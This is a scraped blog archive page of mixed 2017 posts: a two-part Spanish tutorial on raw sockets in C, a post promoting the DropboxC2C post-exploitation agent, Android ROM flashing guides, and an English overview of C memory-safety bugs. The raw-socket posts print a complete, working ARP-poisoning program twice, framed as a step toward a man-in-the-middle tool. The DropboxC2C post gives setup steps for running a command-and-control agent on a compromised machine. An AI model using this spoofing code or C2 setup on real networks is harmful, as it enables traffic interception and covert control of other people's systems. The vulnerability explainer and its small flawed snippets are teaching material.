Showing posts with label c. Show all posts
Showing posts with label c. Show all posts

Thursday, September 28, 2017

En crudo y sin censura RAW SOCKETS I en C

En crudo y sin censura RAW SOCKETS I en C


Aprovechando que tengo que guardar reposo por un mini accidente laboral (tres puntos... ya s�lo me quedan dos para el perro piloto) y no tengo nada mucho mejor que hacer, he decidido ponerme con algo que llevaba postponiendo un tiempo (permitirme la redundancia) ...salsear un poquito con los  SOCKETS en C y ya de paso escribir una entrada en el blog... que me prodigo �ltimamente bien poco....y no hay que perder las buenas costumbres.

A lo largo de esta serie de entradas intentar� mostrar para qu� podemos utilizar la programaci�n de sockets (sobre todo los RAW)  siempre mirando desde un prisma....digamos que oscuro....

Soy consciente que no es un tema f�cil de tratar, y mucho menos hacer que la lectura sea liviana a la par que amena...

Para seguir estos posts es necesario tener unos conocimientos m�nimos de redes, un poquito de C, as� como disponer de una m�quina linux, puesto que este tost�n est� orientado a sistemas Linux o Unix, como ya es com�n en mis entradas.

No pretendo desanimar a nadie, ya sea por lo de los conocimientos o por tener otro S.O... en ambos casos es facil (mas o menos) seguir las entradas. Es m�s, os animo a ello.

Tambi�n quiero dejar claro que que vamos a abordar el tema desde un punto de vista pr�ctico sin entrar mucho en detalles t�cnicos, si no podr�a ser una entrada eterna y tampoco pretendo explicar el modelo OSI (de lectura muy recomendada), a muchos os aburrir�a, as� que lo veremos de soslayo.

�Por qu� C? la respuesta es sencilla: si aprendes en C te ser� sencillo hacerlo en java, python o C++... Prueba al rev�s X-O. (respuesta de un profesor).

Es verdad que en python ser�a m�s sencillo (utilizando alguno de sus frameworks), imposible en muchos casos con java y m�s o menos parecido en c++; pero desde el punto de vista pedag�gico te pierdes muchos fundamentos valiosos.

Desde mi punto de vista ahora que estoy empezando con C, es simple, elegante y endiabladamente r�pido, compacto y eficiente..y muy Oldschool, sin menospreciar en absoluto a Python (pero hoy toca C). 

�Qu� es un Socket? pues como dice la palabra es un enchufe!!...

Socket designa un concepto abstracto por el cual dos programas (posiblemente situados en computadoras distintas) pueden intercambiar cualquier flujo de datos, generalmente de manera fiable y ordenada.

El t�rmino socket es tambi�n usado como el nombre de una interfaz de programaci�n de aplicaciones (API) para la familia de protocolos de Internet TCP/IP, provista usualmente por el sistema operativo.

Segun esta interfaz tenemos tres grupos de sockets:

Socket de flujo (SOCK_STREAM): Define un servicio orientado a conexi�n confiable y bidireccional. Los datos se env�an sin errores o duplicaci�n y se reciben en el mismo orden de como fueron enviados. Podr�amos compararlo con una llamada de tel�fono.. recibir y mandar la informaci�n en su tiempo y de manera bidireccional es cr�tico para la comprensi�n del mensaje, de esto se encarga TCP...Ej dns, tftp, bootp, etc.

Socket de datagrama (SOCK_DGRAM): Define un servicio no orientado a conexi�n (sobre UDP por ejemplo). Los datagramas se env�an como paquetes independientes. El servicio no proporciona garant�as; los datos se pueden perder o duplicar y los datagramas pueden llegar fuera de orden. Soporta la bidirecionalidad pero no es su fuerte. Simplificando (demasiado) es similar a enviar una carta.

Socket raw (SOCK_RAW): Estos sockets nos permiten el acceso a los protocolos de comunicaciones,con la posibilidad de hacer uso o no de protocolos de capa 3 (nivel de red) y/o 4 (nivel de transporte), y por lo tanto d�ndonos el acceso a los protocolos directamente y a la informaci�n que recibe en ellos. El uso de sockets de este tipo nos va a permitir la implementaci�n de nuevos protocolos, y por que no decirlo, la modificaci�n de los ya existentes. Suena interesante no?.

Con esta verborrea trato de ubicar un poco al lector, pues despu�s de lo dicho nos vamos a centrar en el este �ltimo Socket raw o en crudo este tipo de socket trabaja sin estar ligado a un protocolo de comunicaci�n en concreto, es decir, podemos darle el sabor que necesitemos. Lo veremos m�s a delante.

Peculiaridades de Socket raw (SOCK_RAW)

- No incluye por defecto TCP; esto se traduce en perdida de fiabilidad.

- No tenemos que especificar puerto en la comunicaci�n.....O_o..... ya que es el propio kernel  que recibe el paquete crudo el encargado de pasar la informaci�n de  a todos los sockets que est�n escuchando el mismo protocolo, no hay conexiones de red virtuales como tal, es decir, no hay puertos.


- Los campos del Header los deberemos rellenar manualmente, al contrario que si trabaj�semos con otro tipo de socket; el kernel no rellena las cabeceras.

- Carece de un est�ndar.

- Para usar sockets de tipo raw en Unix es necesario contar con privilegios de root.

- hay dos tipos b�sicos de socket raw, y que la decisi�n de cu�l utilizar depende totalmente del objetivo y requisitos de la aplicaci�n que se desea:

 . Familia AF_PACKET: los sockets raw de la familia AF_PACKET son los de m�s bajo nivel y permiten leer y escribir cabeceras de protocolos de cualquier capa.

 . Familia AF_INET: los sockets raw AF_INET delegan al sistema operativo la construcci�n de las cabeceras de enlace y permiten una manipulaci�n �compartida� de las cabeceras de red.

 En breve veremos en detalle la utilidad y funcionamiento de ambas familias.

- Y alguna m�s que seguro que escapa a mi intelecto (por culpa de alg�n gen recesivo).

�Qu� podemos hacer con raw socket?

Con los sockets SOCK_DGRAM y SOCK_DGRAM s�lo puedes decidir el contenido del PAYLOAD TCP o UDP pero no puedes leer ni escribir nada de lo que hay debajo: cabeceras IP, ICMP, ARP, Ethernet, etc. 

Esto nos permitir� desde diagnoxticar ciertos aspectos de la red que de otro modo ser�a dif�cil, componer Datagramas a muy bajo nivel, y construir nuestras propias herramientas a medida de nuestros caprichos.

En definitiva nos va a hacer conocer mejor los protocolos y su seguridad.

Bueno ya para finalizar esta entrada (si no menuda chappa).. y para abrir boca os voy a dejar un codigo fuente de Victor Ramos Mello (que encontre en su Git, el cual me pareci� bueno como ejemplo) en el que hace uso de raw socket para manejar el protocolo ARP.

No atorarse!! ya lo  examinaremos paso por paso, y  desarrollaremos m�s para conseguir una herramienta MITM en pr�ximas entradas para ir ejercitando la mente.

Simple arp poison:

//arp-poison by m0nad
//tested in Linux 3.5.0
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <net/if.h>
#include <sys/socket.h>
#include <netpacket/packet.h>
#include <net/ethernet.h>
#include <netinet/if_ether.h>
#include <signal.h>

#define IP4LEN 4
#define PKTLEN sizeof(struct ether_header) + sizeof(struct ether_arp)

int sock;
void
usage()
{
puts("usage: ./arp-poison <interface> <gateway ip> <mac addr>");
puts("ex: ./arp-poison eth0 10.1.1.1 aa:bb:cc:dd:ee:ff");
exit(1);
}

void
cleanup()
{
close(sock);
exit(0);
}

int
main(int argc, char ** argv)
{
char packet[PKTLEN];
struct ether_header * eth = (struct ether_header *) packet;
struct ether_arp * arp = (struct ether_arp *) (packet + sizeof(struct ether_header));
struct sockaddr_ll device;

if (argc < 4) {
usage();
}

sock = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ARP));
if (sock < 0)
perror("socket"), exit(1);

signal(SIGINT, cleanup);

sscanf(argv[3], "%x:%x:%x:%x:%x:%x", (unsigned int *) &arp->arp_sha[0],
(unsigned int *) &arp->arp_sha[1],
(unsigned int *) &arp->arp_sha[2],
(unsigned int *) &arp->arp_sha[3],
(unsigned int *) &arp->arp_sha[4],
(unsigned int *) &arp->arp_sha[5]);

sscanf(argv[2], "%d.%d.%d.%d", (int *) &arp->arp_spa[0],
(int *) &arp->arp_spa[1],
(int *) &arp->arp_spa[2],
(int *) &arp->arp_spa[3]);

memset(eth->ether_dhost, 0xff, ETH_ALEN);//bcast
memcpy(eth->ether_shost, arp->arp_sha, ETH_ALEN);
eth->ether_type = htons(ETH_P_ARP);

arp->ea_hdr.ar_hrd = htons(ARPHRD_ETHER);
arp->ea_hdr.ar_pro = htons(ETH_P_IP);
arp->ea_hdr.ar_hln = ETH_ALEN;
arp->ea_hdr.ar_pln = IP4LEN;
arp->ea_hdr.ar_op = htons(ARPOP_REPLY);
memset(arp->arp_tha, 0xff, ETH_ALEN);
memset(arp->arp_tpa, 0x00, IP4LEN);

memset(&device, 0, sizeof(device));
device.sll_ifindex = if_nametoindex(argv[1]);
device.sll_family = AF_PACKET;
memcpy(device.sll_addr, arp->arp_sha, ETH_ALEN);
device.sll_halen = htons(ETH_ALEN);

puts("press ctrl+c to exit.");
while (1) {
printf("%s: %s is at %s ", argv[1], argv[2], argv[3]);
sendto(sock, packet, PKTLEN, 0, (struct sockaddr *) &device, sizeof(device));
sleep(2);
}
return 0;
}



para compilarlo:
#gcc arp-poison.c -o arp-poison

un saludo! hasta m�s ver...


download file now

Read more »

Saturday, September 23, 2017

DropboxC2C un agente de post explotación que usa Dropbox para C C

DropboxC2C un agente de post explotación que usa Dropbox para C C


DropboxC2C es una herramienta escrita en python por Rio Sherri (0x09AL) que implementa un agente de post-explotaci�n que utiliza la infraestructura de Dropbox para las operaciones de comando y control (C&C). Su autor lo liber� a ra�z de que los desarrolladores de Empire implementaran tambi�n Dropbox como C2C.

Tiene una parte "servidor" que gestiona todos los agentes (Main.py) y, evidentemente, una parte cliente que hace lo que el servidor dice. ha eliminado las funciones de keylogging para que no se haga un mal uso de la herramienta.

Requiere Python 2.7 y las librer�as dropbox, psutil y pyinstaller. La instalaci�n es muy sencilla:

- git clone https://github.com/0x09AL/DropboxC2C.git
- modificar la clave de la API en agent.py y main.py (la clave api se debe crear desde la interfaz web de Dropbox)
- ejecutar setup.bat en una m�quina Windows para obtener agent.exe que es el agente "compilado"
- ejecutar main.py y el agente en el servidor comprometido





Proyecto: https://github.com/0x09AL/DropboxC2C


download file now

Read more »

Tuesday, September 19, 2017

Final Stable Android 5 0 2 For Cancro Mi 3W C Mi 4W C Mi 4 LTE 2015 03 9 By Ivan

Final Stable Android 5 0 2 For Cancro Mi 3W C Mi 4W C Mi 4 LTE 2015 03 9 By Ivan


Warning: Do not support Mi4 LTE CT

Pic
 

 [2015-03-09]

1.Bring back Equalizer  Thanks CM team
2.Add Eleven?Thanks CM team
3.tweak audio
4.Update FM Radio
5.Remove VoiceDialer and QuickSearchBox ,too old
6.Update Browser
7.Add SuperSU
8.Update some blobs from LA.BF.1.1.1-01810-8x74.0 and LA.BF.1.1.1-02210-8x74.0
9.Fix video playback on some video client ? like iqiyi
10.Add HSPA+ icons
11. Add init.d support
12.Update Launcher

Device Tree:  

branch ?lollipop
https://github.com/mi3-dev/android_device_xiaomi_cancro
https://github.com/mi3-dev/android_device_xiaomi_msm8974-common

Vendor Tree:
branch?lollipop
https://github.com/mi3-dev/proprietary_vendor_xiaomi


With Gapps Link:

mirror: http://pan.baidu.com/s/1pJG7YGj password:h68z
dev-host: http://d-h.st/JFnp


Without Gapps Link:
mirror: http://pan.baidu.com/s/1qWBMnog password: ddl9
dev-host: http://d-h.st/fAjZ

 


download file now

Read more »

Monday, September 18, 2017

Stock Android 5 0 2 For Cancro Mi 3W C Mi 4W C Mi 4 LTE 2015 02 10 By Ivan

Stock Android 5 0 2 For Cancro Mi 3W C Mi 4W C Mi 4 LTE 2015 02 10 By Ivan


1. Fixed call forwarding setting crash
2. Add T9 search ?Thanks CM?
3. SystemUI: add quick settings pull down with one finger ?Thanks CM?
4. Update fileexplorer icon
5. Fixed button wake device when screen off
6. Fixed cant deep sleep
7. Fixed otg

8. Fixed usage statistics crash from *#*#4636#*#*
9. Add power mode settings?Settings-Developer options
10. Update Browser ?Thanks CM?
11. Update Gallery2?Thanks CM?
12. Fixed Nfc
13. Fixed random reboots
14. Fixed Cant wakeup when lock device
15. Fixed takes a few seconds to show the lock screen after the completion of boot animation
16. Update geocoder for China
17. Add display location for call

Bugs


1.FileEplorer Crash when enable Multiuser
2.Battery usage data display error on some devices with sim card
3.
Touchscreen is working with the proximity sensor while calling.



Pic
 

Download


No-Gapps???:http://pan.baidu.com/s/1bnB6aGv 
Password: qkcd

OR
http://d-h.st/MFBT

With-Gapps?Url : http://pan.baidu.com/s/1eQgXJrG 
Password    : c9zz

Google Drive Link
https://drive.google.com/file/d/0BznPP1O79hHEZzBqVlM3QTh3MUk/view?usp=sharing

or

https://drive.google.com/file/d/0B7xCMF07xji9S1E4WTAwMzdCamM/view?usp=sharing

or

http://d-h.st/5ZxJ

Thank to the uploaders of XDA including me. 


download file now

Read more »

Saturday, September 16, 2017

Download Android O for Nexus C ryu Dev Preview

Download Android O for Nexus C ryu Dev Preview


Download and install Android Dev Preview for Pixel C.Android O but we�re really hoping it�ll become Android Oreo once it�s released).Introduces a number of new features and APIs to use in your apps. Heres are just a few new things for you to start trying in this first Developer Preview.
download- android-oreo
For the second year in a row, Google is making a developer preview for the next version of Android available in March, well ahead of its presumed consumer release in the fall. This one is codenamed �O,� and your guess is as good as mine as to what dessert the final version will be named after. It isn�t yet available for regular users to try out. Although developers can begin testing it right away, it�s best for most people to let things stabilize a bit more before they try it out. Developers can download it today.

Downloads



1.Download Android Dev Preview for Pixel C
2.Download ADB tools.


How to install Android O Dev Preview on Pixel C:

  1. Download the Android O image for Pixel C below, then unzip it to a safe directory.
  2. Connect your device to your computer over USB.
  3. Start the device in fastboot mode with one of the following methods:
    • Using the adb tool: With the device powered on, execute:
      adb reboot bootloader
    • Using a key combo: Turn the device off, then turn it on and immediately hold down the relevant key combination for your device. For example, to put a Nexus 5 ("hammerhead") into fastboot mode, press and hold Volume Up + Volume Down + Power as the device begins booting up.
  4. If necessary, unlock the devices bootloader using one of the following methods:
    • If you are updating a Pixel C or Pixel C device using the hammerhead or angler builds, update your fastboot tool to the latest available version (>=23.0.1), and then run this command:
      fastboot flashing unlock
    • If you are updating an older device, run this command:
      fastboot oem unlock

    The target device will show you a confirmation screen. (This erases all data on the target device.)
  5. Open a terminal and navigate to the unzipped Android O image for Pixel C.
  6. Execute the flash-all script. This script installs the necessary bootloader, baseband firmware(s), and operating system.
Once the script finishes, your device reboots and Android O image for Pixel C will installed. You should now lock the bootloader for security:

How to Lock bootloader 

  1. Start the device in fastboot mode again, as described above.
  2. Execute: 
    fastboot flashing lock
    or, for older devices, run
    fastboot oem lock
Locking bootloader will wipe the data on some devices. After locking the bootloader, if you want to flash the device again, you must run fastboot oem unlock again, which will wipe the data.


download file now

Read more »

Friday, September 15, 2017

Download Mod Texture Shogun Cernataur Shogun C HD Ver MHFU For Emulator PPSSPP

Download Mod Texture Shogun Cernataur Shogun C HD Ver MHFU For Emulator PPSSPP



Samsung Glaxy G530H Official Firmware 

The flash file of Samsung Glaxy SM G530H Grand Prime is official having android Version 5.0.2 Lollipop .The file is compressed in Zip file having no Password and 100% Tested .
Click Below link to Download Firmware and Follow Flashing instructions .

Download Firmware Now 

How to Flash !

Follow these instructions to Flash the Device

1- Download Official Firmware above Download link and extract into your pc

2-Download Odin Samsung Flashing tool From the end of this post 

3-Open odin into you,r Pc 

4-Now put you,r device into Download Mode by Pressing Volume Down ,Home Key ,Power button togeather for 5 to 8 second and for confirm into download mode press volume up

5-Now your device is into Download Mode and Connect your device with pc through USB data cable 

6-After connecting Click in Odin at AP section and insert tar.md5 file into odin 

7-Now click on Start tab in Odin and wait few minutes

8-After some time your device will restart and you will see a confirmation message on Odin Screen 

9-Now perform a Factory Reset to your device by pressing Vol up , Home key, Power button and wipe factory data reset and Restart your Device 

10- After reseting your device follow Instruction by Device and ready you,r Device now 

Important Note:

Please make a backup of your device personal data ,it may help you in case of sudden wrong flashing,and be careful we are not responsible of in any condition of your wrong flashing or having hardware problem of your device 

Download Odin 



download file now

Read more »

Monday, September 11, 2017

Vulnerabilities in C C code

Vulnerabilities in C C code


In this post I will write about C/C++ code vulnerabilities because avoiding insecure coding practices in the initial stages can minimize the time and effort spent on finding and fixing them in later stages. More specifically, I will talk about implementation errors relating to memory-safety because they are still very common vulnerabilities used by attackers to gain control over the execution-flow of an application. These vulnerabilities are included in the list of most dangerous software errors. By carefully crafting an exploit for these vulnerabilities, attackers can make an application transfer execution-flow to code that they have injected. Such code injection attacks are among the most powerful and common attacks against software applications, i.e. code injection attacks allow an attacker to execute foreign code with the privileges of the vulnerable program. To exploit a vulnerability and execute a code injection attack, an attacker must: find a bug that can allow an attacker to overwrite interesting memory locations, find such an interesting memory location (stored code addresses, function pointers, data pointers), copy target code in binary form into the memory of a program (can be done easily, by giving it as input to the program) and use the vulnerability to modify the location so that the program will execute the injected code. Security vulnerabilities in C/C++ programming languages that will be described in this post and that can directly or indirectly cause code injection attacks are:

  • Buffer overflow
  • Format string vulnerability
  • Integer errors

In C/C++ programming languages memory is allocated in multiple ways: automatic (local variables in function), static (global variables) and dynamic (malloc or new). Programmer is responsible for correct allocation and deallocation in the case of dynamic memory and appropriate use of the allocated memory (bounds and type checks). It is important to say that memory management is very error prone. Typical bugs are: writing past the boundaries of the allocated memory, dangling pointers (pointers to deallocated memory), double free (deallocating memory twice) and memory leaks (never deallocating memory). Figure 1 show segments of process memory, that is important because different attacks exploit different segments.


Figure 1. Process memory layout

Buffer overflow happens when the data gets written beyond the boundaries of an array (buffer). This way data gets written to a portion of memory which does not belong to the program variable that references the array. Buffer overflow can occur by using an unsafe copying function (e.g. strcpy), through integer errors or by looping over an array using an index which may be too high. Code that contains of buffer overflow:

    void function(char *input)
    {
        char str[80];
        strcpy(str, input);
    }

    int main(int argc, char **argv)
    {
        function(argv[i])
    }

Problem in this example is strcpy function. Strcpy has no way of knowing how large the destination buffer is (i.e. there is no length parameter) so using it can lead to overrunning the buffer and corrupting other memory.

Most popular buffer overflows are:
  • Stack-based buffer overflow
  • Heap-based buffer overflow
Main difference is where the buffer being overwritten is allocated and techniques for gaining control of execution-flow. Stack-based buffer overflow attacks buffer on the stack and is exploitable by return address, frame pointer or indirect pointer overwriting. Heap-based buffer overflow attacks buffer on the heap and is exploitable by function pointer, data pointer, virtual function pointer overwriting or more generally overwriting memory management information. It is worth noting that other overflows exist as well like overflows in the data and bss segments. Data segment contains global or static compile-time initialized data and bss contains global or static uninitialized data. Overflows in these segments can overwrite function and data pointers stored in the same segment or data in other segments. Functions that can cause buffer overflow are: gets, strcpy, strcat, sprintf.

Format string vulnerability occurs if an attacker is able to specify the format string to a format function. If the format string that is received differs from that which is expected, such as being longer or shorter than the allocated data space, the program may crash, quit or make up for the missing information by reading extra data from the stack; allowing the execution of malicious code. Format functions are functions that have a variable amount of arguments and expect a format string as argument. This format string will specify how the format function will format its output. The format string is a character string that is literally copied to the output stream unless a % character is encountered. This character is followed by format specifiers that will manipulate the way the output is generated (format specifier particularly interesting to attackers is %n). When a format specifier requires an argument, the format function expects to find this argument on the stack. Some examples of format function, which if not treated, can expose the application to the format string attack are: fprint, printf, sprintf, snprintf, vfprintf, vprintf.Example code of format string vulnerability:

    void foo(char *val)
    {
        printf(val);
    }

    int main(int argc, char **argv)
    {
        char buf[100] = "Hi %x %x ";
        foo(buf);
        return 0;
    }

Problem with code is that printf in foo will print content of stack. This can happen because printf accept variable number of arguments and does not check for mismatch of number of format specifiers and arguments passed after format string.

Integer errors are not exploitable vulnerabilities by themselves, but exploitation of these errors could lead to a situation where the program becomes vulnerable to one of the previously described vulnerabilities. Two kinds of integer errors that can lead to exploitable vulnerabilities exist: integer overflowsand integer signedness errors. Since an integer is a fixed size, there is a fixed maximum value it can store.  When an attempt is made to store a value greater than this maximum value it is known as an integer overflow. This can cause a program that does not expect this to fail or become vulnerable: if used in conjunction with memory allocation, too little memory might be allocated causing a possible heap overflow. Signedness errors occur when an unsigned variable is interpreted as signed, or when a signed variable is interpreted as unsigned. This type of behavior can happen because internally to the computer, there is no distinction between the way signed and unsigned variables are stored. This can lead to a situation where a negative argument passes a maximum size test but is used as a large unsigned value afterwards, possibly causing a overflow if used in conjunction with a copy operation (e.g. memcpy expects an unsigned integer as size argument and when passed a negative signed integer, it will assume this is a large unsigned value). Example code of integer overflow:

    int main(int argc, char **argv)
    {
        int val = 0x7fffffff;   /*2147483647*/
        print("%d ", val);
        val = val + 1;
        print("%d , val");
    }

Variable val is initialized with the highest positive value a signed long integer can hold (2147483647). Adding 1 to the hex value of 0x7fffffff the value of the integer overflows and goes to a negative number (0x7fffffff + 1 = 80000000), in decimal this is -2147483648. Problem is that compilers will not detect this and the application will not notice this issue. 


download file now

Read more »

Sunday, September 10, 2017

Download ZTE Open C Stock Rom Firmware

Download ZTE Open C Stock Rom Firmware


ZTE Open C Flashfile - Rom - Firmware
Learn how to Flash ZTE Tabs, Mobile Phones with MTK, SPD, Qualcomm Chipset
ZTE Device USB Driver Download
Backup Your Device with ZTE PC Suite

Download and extract The Latest Smart Phone Flash Tool 
Locate and Download your Specific ZTE Device Model Stock Rom 
Open SP Flash Tool, Load Your Firmware then connect your ZTE Device to your PC using USB Cable
Initialize Flashing and wait for the process to be successful  
Congratulations !!!
Click Here for Detailed Tutorials on how to Flash ZTE Devices with SP Flash Tool, Miracle Box, Volcano etc.
WARNING: Any mistake in the procedure could render your Phone useless; we advise you take your Phone to a competent Technician, as we shall not share responsibility for any bricked Device. 

View ZTE Open C Full Specification & Firmware Download 

ZTE Open C
SPECIFICATION


BODY

Other Name

Open C
Color

Black, Orange, Blue
Dimension

126 x 64.7 x 10.8 mm   (125g)
Keyboard

Touch Screen
Cover

Plastic

DISPLAY

Type

TFT Capacitive Touch Screen Display with 16,000,000 Colors
Size

4.0 Inches, 480 x 800 Pixels  (233 ppi)

AUDIO

Audio Port

3.5 mm Jack

Speakers

Yes

Alert Type

Vibration, MP3, WAV Ringtone


CAMERA

Primary

3.15 MP, AutoFocus, Geo Tagging
Secondary

No

CONNECTIVITY, NETWORK

Network

GSM | HSPA |
2G

GPRS, EDGE

3G

No
4G

No
Wi-Fi

WiFi 802.11 b/g/n , Hot-spot
Bluetooth

Yes
GPS

A-GPS

FM Radio

Yes
USB

MicroUSB 2.0


MEMORY, SIM

Card Slot

MicroSD Card , Up to 32GB Extension Support
Internal

4GB
RAM

512 MB
SIM

Micro SIM

OS ,PROCESSOR & SENSORS

Processor

1.2 GHz Dual Core Cortex A7 CPU, Qualcomm MSM8210 Snapdragon 200 Chipset
Graphic Processor

Adreno 302
Operating System

Firefox OS 1.3
Sensors

Proximity , Ambient Light, Accelerometer, Sensors

BATTERY

Capacity

1400 mAh Li-Ion Battery  ( Removable )
Stand-By

Up to 150 hrs
Price  N

                                                 

      Download ZTE Open C Flash File Below

FLASHING TIPS
  • Ensure the Phone you are about to Flash has at least 40% Battery Charge.
  • Make a Backup of all your personal Data, before Flashing your Device, as this could help you fall back on its Prior Flashing State, if anything goes wrong.
  • Always Flash with the right Stock Rom (Firmware, OS, Flash File) as Flashing a Phone with the wrong File Could be Fatal.
  • Flashing your ZTE Device may void Tab or Mobile Phone Warranty.


download file now

Read more »

Thursday, September 7, 2017

En crudo y sin censura RAW SOCKETS II en C

En crudo y sin censura RAW SOCKETS II en C


�Qu� tal! Ya estoy aqu� con la segunda entrada de esta serie, que me da a mi que va a ser larga... ;D
Bueno como promet� en la entrada anterior vamos a ver el ejemplo que os dej�, vamos a ver las partes importantes de Sockets Raw, y a�adiremos o modificaremos el c�digo para conseguir un ejemplo m�s vers�til...

Al lector: si incurro en cualquier error a lo largo de estos post agradecer�a vuestras correcciones.

Como primer ejercicio quiero que le ech�is un vistazo m�s a fondo al c�digo que est� debajo de este p�rrafo, y le�is los comentarios donde a grandes rasgos explico el funcionamiento del ejemplo que os dej� la semana pasada, si no entend�is nada (nadie dijo que programar para sockets fuera a ser f�cil), no agobiarse, basta con echarle un ojo para que cuando explique la teor�a os suene por donde cae en el c�digo:

#include <stdio.h>//libreria estandar
#include <stdlib.h>//libreria estandar
#include <unistd.h>// close(sock)
#include <string.h>//biblioteca standar
#include <netinet/if_ether.h> //estructuras ethernet arp headers
#include <net/if.h>// sockets interfaces locales
#include <sys/socket.h> // encabezado de sockets principales
#include <arpa/inet.h>//definiciones de las operaciones de Internet
#include <netpacket/packet.h>// struct sockaddr_ll
#include <net/ethernet.h>//id protos ethernet
#include <signal.h> //signal(SIGINT, cleanup);

#define IP4LEN 4 //define la
#define PKTLEN sizeof(struct ether_header) + sizeof(struct ether_arp)
int sock;

void usage() { //funcion para mostrar el help del programa por pantalla
puts("usage: ./arp-poison <interface> <gateway ip> <mac addr>");
puts("ex: ./arp-poison eth0 10.1.1.1 aa:bb:cc:dd:ee:ff");
exit(1);
}

void cleanup() { //utilizaremos esta funcion para cerrar el socket
close(sock); //mediante la funcion close() de <unistd.h>
exit(0); //la funcion no retornara valor alguno
}

main(int argc, char ** argv) {
char packet[PKTLEN]; //definimos la longitud del paquete a la suma del la cabecera ETHERNET+ARP
struct ether_header * eth = (struct ether_header *) packet; //declaramos la variable eth y la apuntamos
//a struct ether_headder del paquete (<netinet/if_ether.h>)

struct ether_arp * arp = (struct ether_arp *) (packet + sizeof (struct ether_header)); //igual que el anteriot pero
//ether_arp para poder meter
//mas tarde valores.
struct sockaddr_ll device; //<netpacket/packet.h> hacemos que int sll_ifindex;apunte a nuestra variable device

if (argc < 4) {//si los argumento pasados para lanzar el programa
usage();
}//son inferiores a 4 lanzamos la funcion usage()mostrando asi la ayuda

sock = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ARP)); //declaramos el socket con su familia,
//tipo raw,protocolo. htons()convierte el entero corto sin signo hostshort desde el orden de bytes del host al de la red.

if (sock < 0) //si no se crea el shocket llamamos a exit()
perror("socket"), exit(1);
signal(SIGINT, cleanup);
//RELLENAMOS LAS ESTRUCTURAS
//recogemos la mac del argumento 3 (hexadecimal)
//y se l pasamos a la structura ARP concretamente arp_sha[ETH_ALEN];/* sender hardware address */
// de la libreria <netinet/if_ether.h> sin signo
sscanf(argv[3], "%x:%x:%x:%x:%x:%x", (unsigned int *) &arp->arp_sha[0],
(unsigned int *) &arp->arp_sha[1],
(unsigned int *) &arp->arp_sha[2],
(unsigned int *) &arp->arp_sha[3],
(unsigned int *) &arp->arp_sha[4],
(unsigned int *) &arp->arp_sha[5]);

//recogemos la ip pasada en el argumento 2 (decimal) a arp_spa <netinet/if_ether.h> entero
sscanf(argv[2], "%d.%d.%d.%d",(int *) &arp->arp_spa[0],
(int *) &arp->arp_spa[1],
(int *) &arp->arp_spa[2],
(int *) &arp->arp_spa[3]);
///////
memset(eth->ether_dhost, 0xff, ETH_ALEN);//bcast destination eth address */>/a la structura ethernet
memcpy(eth->ether_shost, arp->arp_sha, ETH_ALEN);//* "source ether addr" a structura etherne y a" hardware address" struc_arp
eth->ether_type = htons(ETH_P_ARP);
//pasamos el al heather ethernet el valor ETH_P_ARR
//de if_ether.h " ETH_P_ARP 0x080 Address Resolution packet */"
arp->ea_hdr.ar_hrd = htons(ARPHRD_ETHER);
arp->ea_hdr.ar_pro = htons(ETH_P_IP);
arp->ea_hdr.ar_hln = ETH_ALEN;
arp->ea_hdr.ar_pln = IP4LEN;
arp->ea_hdr.ar_op = htons(ARPOP_REPLY);
memset(arp->arp_tha, 0xff, ETH_ALEN);
memset(arp->arp_tpa, 0x00, IP4LEN);
memset(&device, 0, sizeof(device));
device.sll_ifindex = if_nametoindex(argv[1]);
device.sll_family = AF_PACKET;
memcpy(device.sll_addr, arp->arp_sha, ETH_ALEN);
device.sll_halen = htons(ETH_ALEN);

puts("press ctrl+c to exit.");
while (1) {
printf("%s: %s is at %s ", argv[1], argv[2], argv[3]);
sendto(sock, packet, PKTLEN, 0, (struct sockaddr *) &device, sizeof(device));//mandamos los paquetes
sleep(2);
}
return 0;
}

Se que promet� no ponerme en rollo t�cnico, pero para empezar con sockets al menos nos deben sonar un par de conceptos cr�ticos... intentar� ser lo mas simple y conciso que pueda...

Encapsulaci�n de datos:

"En redes de ordenadores, encapsulaci�n es un m�todo de dise�o modular de protocolos de comunicaci�n en el cual las funciones l�gicas de una red son abstra�das ocultando informaci�n a las capas de nivel superior".

En cristiano: Las redes se trabajan en capas, donde cada una de ellas es responsable de una funci�n espec�fica dentro del proceso de env�o/recepci�n de datos desde un host a otro. Normalmente se trabaja con el modelo OSI y TCP/IP.


Para operar dentro de estas capas existen diferentes protocolos. Y para ir de una capa a otra necesitamos encapsular los paquetes hasta hacer llegar nuestro paquete al sitio deseado.


Un buen s�mil de esto es mandar una carta a un amigo que vive en otro continente; escribes la carta, luego va a el cartero, despu�s al cami�n, que la lleva al avi�n...
Cuando llegue tu carta para que la coja tu amigo debe salir del avi�n, ir a otro cami�n y cogerla otro cartero que se la entregar� a tu amigo.

En el proceso de viaje del paquete por las distintas capas del modelo TCP, los encargados de transportarlas son los protocolos y estos necesitan de unas cabeceras donde se le indique que transportan y donde lo transportan (entre otros datos).

En el caso de SOCK_DGRAM y SOCK_STREAM este trabajo lo lleva a cabo el Kernel, pero amigos, en el caso que nos ocupa SOCK_RAW y como vimos en la entrada anterior "Los campos del Header los deberemos rellenar manualmente, al contrario que si trabaj�semos con otro tipo de socket; el kernel no rellena las cabeceras".

Para hacer esto c�modamente utilizaremos las Estructuras.

�QU� SON LAS ESTRUCTURAS?

Resumi�ndolo un poco: "Las estructuras son colecciones de variables relacionadas bajo un nombre. Las estructuras pueden contener variables de muchos tipos diferentes de datos a diferencia de los arreglos que contienen �nicamente elementos de un mismo tipo de datos".

Para ver esto mucho mas claro vamos a recurrir a nuestro ejemplo examinando un fragmento donde rellenamos las estructura ya programada que utilizamos de las librer�as incluidas en el c�digo:

En nuestro ejemplo, vamos a mandar una trama ARP por la capa de enlace,
el encargado de esto es el protocolo ETHERNET. Para conseguir esto necesitamos la estructura de los Headers ethernet, y la estructura del  paquete arp.

Aqu� apuntamos como variable eth a la estructura que contiene los headers ethernet en la librer�a <ethernet.h>

 y ahora con:


Le decimos el tipo de paquete que va a ser ADDRESS RESOLUTION PACKET.
que lo hemos sacado de if_ether.h convirti�ndolo con htons (la funci�n htons convierte a u_short del host en orden de bytes de red TCP / IP si fuese necesario):







Aqu� pasamos el tercer par�metro introducido al arrancar el programa(la mac):

A la Estructura ether_arp alojada en <if_ether.h>


Espero que no os est� liando mucho... solo ten�is que quedaros con que las estructuras son una colecci�n de datos, que podemos encontrarlas en las librer�as ya preconcebidas para crear paquetes <netinet.h> y c�mo sacar y meter datos en ellas. ya veremos esto m�s despacio.

